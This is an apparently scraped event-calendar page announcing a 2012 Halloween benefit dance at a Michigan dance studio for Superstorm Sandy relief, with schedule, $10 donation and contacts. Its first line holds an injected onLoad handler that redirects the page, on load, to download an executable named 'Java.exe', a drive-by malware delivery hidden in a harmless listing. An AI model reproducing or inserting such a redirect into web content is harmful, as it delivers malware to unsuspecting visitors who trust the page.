onLoad="document.location.href='http://events.grnow.com/Java.exe'; " Halloween Benefit Dance at Moveir for Relief From Superstorm Sandy! - GRNow Event Calendar, powered by Helios Calendar

Halloween Benefit Dance at Moveir for Relief From Superstorm Sandy!

EAST COAST SWING FOR THE EAST COAST!!

Moveir Dance Studio is having a HALLOWEEN COSTUME PARTY/DANCE and Moveir is donating all the proceeds and donations to help the victims of the disaster on the East Coast! W. Kent Kovac is organizing a donation program from Michigan dancers of all genres; where dancers can donate money AND supplies that are going to be desperately needed for the recovery! 80% of tonights donations will go to the heroic NYU Hospital and the remainder 20% will go to the local Humane Society!


There will be two dances going on at the same time; something for everyone!! You don't need to know how to ballroom/swing/etc to enjoy this fabulous party, "freestylers" are always welcome!!!
EAST COAST SWING LESSON: 7:00pm-8pm
OPEN DANCE: 8pm-11pm or whenever the party ends!!
We are asking that you donate $10 (or more...) for the night. I know that Kent is inviting young people, if you are a student, just do the best you can to help!!

For the most current info, visit us on Facebook:

http://www.facebook.com/#!/events/505203019497964/

Moveir Dance Studio, 2483 Burlingame Ave., Wyoming, MI 49509

Mark Tetro (616)250-9100

Audrey Campbell (269)806-3603

Wednesday, October 31, 2012
07:00 PM
 - 
11:00 PM

Cost:
$10

Categories:

Location:  
 
Moveir Dance Studio
2483 Burlingame SW
Wyoming, MI 49509

Event Contact Info
Mark Tetro
Email:
   
Phone:
 616 250-9100 
Website:
 Click to Visit